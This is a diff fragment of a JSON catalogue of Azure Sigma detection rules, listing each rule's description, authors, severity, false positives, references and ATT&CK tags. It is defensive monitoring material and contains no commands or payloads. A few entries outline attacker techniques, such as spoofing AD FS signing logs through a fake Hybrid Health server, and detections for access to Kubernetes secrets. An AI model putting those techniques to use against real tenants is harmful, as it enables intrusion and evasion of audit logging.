+ ], + "filename": "azure_kubernetes_cluster_created_or_deleted.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://attack.mitre.org/matrices/enterprise/cloud/", + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", + "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_cluster_created_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "9541f321-7cba-4b43-80fc-fbd1fb922808", + "value": "Azure Kubernetes Cluster Created or Deleted" + }, + { + "description": "Detects when a user is removed from a privileged role. 
Bulk changes should be investigated.", + "meta": { + "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", + "creation_date": "2022/08/05", + "falsepositive": [ + "Legtimate administrator actions of removing members from a role" + ], + "filename": "azure_priviledged_role_assignment_bulk_change.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_priviledged_role_assignment_bulk_change.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ] + }, + "uuid": "102e11e3-2db5-4c9e-bc26-357d42585d21", + "value": "Bulk Deletion Changes To Privileged Account Permissions" + }, + { + "description": "Identifies when a network security configuration is modified or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/08", + "falsepositive": [ + "Network Security Configuration being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Network Security Configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "azure_network_security_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_network_security_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "d22b4df4-5a67-4859-a578-8c9a0b5af9df", + "value": "Azure Network Security Configuration Modified or Deleted" + }, + { + "description": "Detects when a user is added to a privileged role.", + "meta": { + "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", + "creation_date": "2022/08/06", + "falsepositive": [ + "Legtimate administrator actions of adding members from a role" + ], + "filename": "azure_priviledged_role_assignment_add.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_priviledged_role_assignment_add.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ] + }, + "uuid": "49a268a4-72f4-4e38-8a7b-885be690c5b5", + "value": "User Added To Privilege Role" + }, + { + "description": "Number of VM creations or deployment activities occur in Azure via the azureactivity log.", + "meta": { + "author": "sawwinnnaung", + "creation_date": "2020/05/07", + "falsepositive": [ + "Valid change" + ], + "filename": "azure_creating_number_of_resources_detection.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + 
"https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/Creating_Anomalous_Number_Of_Resources_detection.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_creating_number_of_resources_detection.yml" + ], + "tags": [ + "attack.t1098" + ] + }, + "uuid": "d2d901db-7a75-45a1-bc39-0cbf00812192", + "value": "Number Of Resource Creation Or Deployment Activities" + }, + { + "description": "Detects when successful sign-ins increased by 10% or greater.", + "meta": { + "author": "Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1', Tim Shelton", + "creation_date": "2022/08/11", + "falsepositive": [ + "Increase of users in the environment" + ], + "filename": "azure_ad_auth_sucess_increase.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-for-successful-unusual-sign-ins", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_auth_sucess_increase.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1078" + ] + }, + "uuid": "67d5f8fc-8325-44e4-8f5f-7c0ac07cb5ae", + "value": "Measurable Increase Of Successful Authentications" + }, + { + "description": "Detect successful authentications from countries you do not operate out of.", + "meta": { + "author": "MikeDuddington, '@dudders1'", + "creation_date": "2022/07/28", + "falsepositive": [ + "If this was approved by System Administrator." 
+ ], + "filename": "azure_ad_authentications_from_countries_you_do_not_operate_out_of.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_authentications_from_countries_you_do_not_operate_out_of.yml" + ], + "tags": [ + "attack.t1078" + ] + }, + "uuid": "8c944ecb-6970-4541-8496-be554b8e2846", + "value": "Successful Authentications From Countries You Do Not Operate Out Of" + }, + { + "description": "Identifies when a virtual network device is being modified or deleted.\nThis can be a network interface, network virtual appliance, virtual hub, or virtual router.\n", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/08", + "falsepositive": [ + "Virtual Network Device being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Virtual Network Device modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "azure_network_virtual_device_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_network_virtual_device_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "15ef3fac-f0f0-4dc4-ada0-660aa72980b3", + "value": "Azure Virtual Network Device Modified or Deleted" + }, + { + "description": "Identifies when a Firewall Policy is Modified or Deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/02", + "falsepositive": [ + "Firewall Policy being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Firewall Policy modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "azure_network_firewall_policy_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_network_firewall_policy_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "83c17918-746e-4bd9-920b-8e098bf88c23", + "value": "Azure Network Firewall Policy Modified or Deleted" + }, + { + "description": "Identifies when a service principal was removed in Azure.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/03", + "falsepositive": [ + "Service principal being removed may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Service principal removed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "azure_service_principal_removed.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_service_principal_removed.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "448fd1ea-2116-4c62-9cde-a92d120e0f08", + "value": "Azure Service Principal Removed" + }, + { + "description": "Monitor and alert for device registration or join events where MFA was not performed.", + "meta": { + "author": "Michael Epping, '@mepples21'", + "creation_date": "2022/06/28", + "falsepositive": [ + "Unknown" + ], + "filename": "azure_ad_device_registration_or_join_without_mfa.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#device-registrations-and-joins-outside-policy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_device_registration_or_join_without_mfa.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1078" + ] + }, + "uuid": "5afa454e-030c-4ab4-9253-a90aa7fcc581", + "value": "Device Registration or Join Without MFA" + }, + { + "description": "Identifies when a new cloudshell is created inside of Azure portal.", + "meta": { + "author": "Austin Songer", + "creation_date": "2021/09/21", + "falsepositive": [ + "A new cloudshell may be created by a system administrator." 
+ ], + "filename": "azure_new_cloudshell_created.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_new_cloudshell_created.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "72af37e2-ec32-47dc-992b-bc288a2708cb", + "value": "Azure New CloudShell Created" + }, + { + "description": "Identifies when a application credential is modified.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/02", + "falsepositive": [ + "Application credential added may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Application credential added from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "azure_app_credential_modification.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://www.cloud-architekt.net/auditing-of-msi-and-service-principals/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_credential_modification.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "cdeef967-f9a1-4375-90ee-6978c5f23974", + "value": "Azure Application Credential Modified" + }, + { + "description": "Detects when an application is granted delegated or app role permissions for Microsoft Graph, Exchange, Sharepoint, or Azure AD", + "meta": { + "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", + "creation_date": "2022/07/10", + "falsepositive": [ + "When the permission is legitimately needed for the app" + ], + "filename": "azure_app_permissions_msft.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_permissions_msft.yml" + ], + "tags": [ + "attack.privilege_escalation" + ] + }, + "uuid": "c1d147ae-a951-48e5-8b41-dcd0170c7213", + "value": "App Granted Microsoft Permissions" + }, + { + "description": "Monitor and alert on conditional access changes where non approved actor removed CA Policy.", + "meta": { + "author": "Corissa Koopmans, '@corissalea'", + "creation_date": "2022/07/19", + "falsepositive": [ + "Misconfigured role permissions", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment." 
+ ], + "filename": "azure_aad_secops_ca_policy_removedby_bad_actor.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure#conditional-access", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_aad_secops_ca_policy_removedby_bad_actor.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1548" + ] + }, + "uuid": "26e7c5e2-6545-481e-b7e6-050143459635", + "value": "CA Policy Removed by Non Approved Actor" + }, + { + "description": "This detection uses azureactivity logs (Administrative category) to identify the deletion of an Azure AD Hybrid health AD FS service instance in a tenant.\nA threat actor can create a new AD Health ADFS service and create a fake server to spoof AD FS signing logs.\nThe health AD FS service can then be deleted after it is not longer needed via HTTP requests to Azure.\n", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "creation_date": "2021/08/26", + "falsepositive": [ + "Legitimate AAD Health AD FS service instances being deleted in a tenant" + ], + "filename": "azure_aadhybridhealth_adfs_service_delete.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://o365blog.com/post/hybridhealthagent/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_aadhybridhealth_adfs_service_delete.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1578.003" + ] + }, + "uuid": "48739819-8230-4ee3-a8ea-e0289d1fb0ff", + "value": "Azure Active Directory Hybrid Health AD FS Service Delete" + }, + { + "description": "Detects when administrator grants either application permissions (app roles) or highly privileged delegated permissions", + "meta": { + "author": "Bailey Bercik '@baileybercik', Mark Morowczynski 
'@markmorow'", + "creation_date": "2022/07/28", + "falsepositive": [ + "When the permission is legitimately needed for the app" + ], + "filename": "azure_app_privileged_permissions.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_privileged_permissions.yml" + ], + "tags": [ + "attack.privilege_escalation" + ] + }, + "uuid": "5aecf3d5-f8a0-48e7-99be-3a759df7358f", + "value": "App Granted Privileged Delegated Or App Permissions" + }, + { + "description": "Identifies when a suppression rule is created in Azure. Adversary's could attempt this to evade detection.", + "meta": { + "author": "Austin Songer", + "creation_date": "2021/08/16", + "falsepositive": [ + "Suppression Rule being created may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Suppression Rule created from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "azure_suppression_rule_created.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_suppression_rule_created.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "92cc3e5d-eb57-419d-8c16-5c63f325a401", + "value": "Azure Suppression Rule Created" + }, + { + "description": "Monitor and alert on conditional access changes.", + "meta": { + "author": "Corissa Koopmans, '@corissalea'", + "creation_date": "2022/07/18", + "falsepositive": [ + "Misconfigured role permissions", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment." + ], + "filename": "azure_aad_secops_new_ca_policy_addedby_bad_actor.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_aad_secops_new_ca_policy_addedby_bad_actor.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1548" + ] + }, + "uuid": "0922467f-db53-4348-b7bf-dee8d0d348c6", + "value": "New CA Policy by Non-approved Actor" + }, + { + "description": "Detects AzureHound (A BloodHound data collector for Microsoft Azure) activity via the default User-Agent that is used during its operation after successful authentication.", + "meta": { + "author": "Janantha Marasinghe", + "creation_date": "2022/11/27", + "falsepositive": [ + "Unknown" + ], + "filename": "azure_ad_azurehound_discovery.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://github.com/BloodHoundAD/AzureHound", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_azurehound_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.004", + "attack.t1526" + ] + }, + "uuid": "35b781cc-1a08-4a5a-80af-42fd7c315c6b", + "value": "Discovery Using AzureHound" + }, + { + "description": "Monitor and alert on conditional access changes. Is Initiated by (actor) approved to make changes? Review Modified Properties and compare \"old\" vs \"new\" value.", + "meta": { + "author": "Corissa Koopmans, '@corissalea'", + "creation_date": "2022/07/19", + "falsepositive": [ + "Misconfigured role permissions", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment." + ], + "filename": "azure_aad_secops_ca_policy_updatedby_bad_actor.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure#conditional-access", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_aad_secops_ca_policy_updatedby_bad_actor.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1548" + ] + }, + "uuid": "50a3c7aa-ec29-44a4-92c1-fce229eef6fc", + "value": "CA Policy Updated by Non Approved Actor" + }, + { + "description": "Identifies user account which has been locked because the user tried to sign in too many times with an incorrect user ID or password.", + "meta": { + "author": "AlertIQ", + "creation_date": "2021/10/10", + "falsepositive": [ + "Unknown" + ], + "filename": "azure_account_lockout.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_account_lockout.yml" + ], + "tags": [ + 
"attack.credential_access", + "attack.t1110" + ] + }, + "uuid": "2b7d6fc0-71ac-4cf7-8ed1-b5788ee5257a", + "value": "Account Lockout" + }, + { + "description": "Detects when changes are made to PIM roles", + "meta": { + "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", + "creation_date": "2022/08/09", + "falsepositive": [ + "Legit administrative PIM setting configuration changes" + ], + "filename": "azure_pim_change_settings.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_pim_change_settings.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1078" + ] + }, + "uuid": "db6c06c4-bf3b-421c-aa88-15672b88c743", + "value": "Changes To PIM Settings" + }, + { + "description": "Monitor and alert for users added to device admin roles.", + "meta": { + "author": "Michael Epping, '@mepples21'", + "creation_date": "2022/06/28", + "falsepositive": [ + "Unknown" + ], + "filename": "azure_ad_users_added_to_device_admin_roles.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#device-administrator-roles", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_users_added_to_device_admin_roles.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1078" + ] + }, + "uuid": "11c767ae-500b-423b-bae3-b234450736ed", + "value": "Users Added to Global or Device Admin Roles" + }, + { + "description": "This detection uses azureactivity logs (Administrative category) to identify the creation or update of a server instance in an Azure AD Hybrid 
health AD FS service.\nA threat actor can create a new AD Health ADFS service and create a fake server instance to spoof AD FS signing logs. There is no need to compromise an on-prem AD FS server.\nThis can be done programmatically via HTTP requests to Azure.\n", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "creation_date": "2021/08/26", + "falsepositive": [ + "Legitimate AD FS servers added to an AAD Health AD FS service instance" + ], + "filename": "azure_aadhybridhealth_adfs_new_server.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://o365blog.com/post/hybridhealthagent/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_aadhybridhealth_adfs_new_server.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1578" + ] + }, + "uuid": "288a39fc-4914-4831-9ada-270e9dc12cb4", + "value": "Azure Active Directory Hybrid Health AD FS New Server" + }, + { + "description": "Monitor and alert for Sign-ins by unknown devices from non-Trusted locations.", + "meta": { + "author": "Michael Epping, '@mepples21'", + "creation_date": "2022/06/28", + "falsepositive": [ + "Unknown" + ], + "filename": "azure_ad_sign_ins_from_unknown_devices.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#non-compliant-device-sign-in", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_sign_ins_from_unknown_devices.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1078" + ] + }, + "uuid": "4d136857-6a1a-432a-82fc-5dd497ee5e7c", + "value": "Sign-ins by Unknown Devices" + }, + { + "description": "Identifies user login with multifactor authentication failures, which might be an indication an attacker has the password for the account but can't 
pass the MFA challenge.", + "meta": { + "author": "AlertIQ", + "creation_date": "2021/10/10", + "falsepositive": [ + "Unknown" + ], + "filename": "azure_mfa_interrupted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_mfa_interrupted.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1078.004" + ] + }, + "uuid": "5496ff55-42ec-4369-81cb-00f417029e25", + "value": "Multifactor Authentication Interrupted" + }, + { + "description": "Detects the change of user type from \"Guest\" to \"Member\" for potential elevation of privilege.", + "meta": { + "author": "MikeDuddington, '@dudders1'", + "creation_date": "2022/06/30", + "falsepositive": [ + "If this was approved by System Administrator." + ], + "filename": "azure_guest_to_member.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-external-user-sign-ins", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_guest_to_member.yml" + ], + "tags": [ + "attack.t1078" + ] + }, + "uuid": "8dee7a0d-43fd-4b3c-8cd1-605e189d195e", + "value": "User State Changed From Guest To Member" + }, + { + "description": "Identifies when a owner is was removed from a application or service principal in Azure.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/03", + "falsepositive": [ + "Owner being removed may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Owner removed from unfamiliar users should be investigated. 
If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_owner_removed_from_application_or_service_principal.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_owner_removed_from_application_or_service_principal.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "636e30d5-3736-42ea-96b1-e6e2f8429fd6", + "value": "Azure Owner Removed From Application or Service Principal" + }, + { + "description": "User has indicated they haven't instigated the MFA prompt and could indicate an attacker has the password for the account.", + "meta": { + "author": "AlertIQ", + "creation_date": "2022/03/24", + "falsepositive": [ + "Users actually login but miss-click into the Deny button when MFA prompt." + ], + "filename": "azure_mfa_denies.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_mfa_denies.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1078.004" + ] + }, + "uuid": "e40f4962-b02b-4192-9bfe-245f7ece1f99", + "value": "Multifactor Authentication Denied" + }, + { + "description": "Detects when PIM alerts are set to disabled.", + "meta": { + "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", + "creation_date": "2022/08/09", + "falsepositive": [ + "Administrator disabling PIM alerts as an active choice." 
+ ], + "filename": "azure_pim_alerts_disabled.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_pim_alerts_disabled.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1484" + ] + }, + "uuid": "aeaef14c-e5bf-4690-a9c8-835caad458bd", + "value": "PIM Alert Setting Changes To Disabled" + }, + { + "description": "Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used.", + "meta": { + "author": "sawwinnnaung", + "creation_date": "2020/05/07", + "falsepositive": [ + "Valid change" + ], + "filename": "azure_granting_permission_detection.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/Granting_Permissions_To_Account_detection.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_granting_permission_detection.yml" + ], + "tags": [ + "attack.t1098" + ] + }, + "uuid": "a622fcd2-4b5a-436a-b8a2-a4171161833c", + "value": "Granting Of Permissions To An Account" + }, + { + "description": "Identifies when a Kubernetes account access a sensitive objects such as configmaps or secrets.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/07", + "falsepositive": [ + "Sensitive objects may be accessed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Sensitive objects accessed from unfamiliar users should be investigated. 
If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_kubernetes_secret_or_config_object_access.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://attack.mitre.org/matrices/enterprise/cloud/", + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", + "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_secret_or_config_object_access.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "7ee0b4aa-d8d4-4088-b661-20efdf41a04c", + "value": "Azure Kubernetes Secret or Config Object Access" + }, + { + "description": "Detects when a configuration change is made to an applications URI.\nURIs for domain names that no longer exist (dangling URIs), not using HTTPS, wildcards at the end of the domain, URIs that are no unique to that app, or URIs that point to domains you do not control should be investigated.\n", + "meta": { + "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", + "creation_date": "2022/06/02", + "falsepositive": [ + "When and administrator is making legitimate URI configuration changes to an application. This should be a planned event." 
+ ], + "filename": "azure_app_uri_modifications.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-configuration-changes", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_uri_modifications.yml" + ], + "tags": [ + "attack.t1528", + "attack.persistence", + "attack.credential_access" + ] + }, + "uuid": "0055ad1f-be85-4798-83cf-a6da17c993b3", + "value": "Application URI Configuration Changes" + }, + { + "description": "Identifies when ClusterRoles/Roles are being modified or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/07", + "falsepositive": [ + "ClusterRoles/Roles being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "ClusterRoles/Roles modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "azure_kubernetes_role_access.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://attack.mitre.org/matrices/enterprise/cloud/", + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", + "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_role_access.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "818fee0c-e0ec-4e45-824e-83e4817b0887", + "value": "Azure Kubernetes Sensitive Role Access" + }, + { + "description": "Identifies when a Keyvault Key is modified or deleted in Azure.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/16", + "falsepositive": [ + "Key being modified or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Key modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
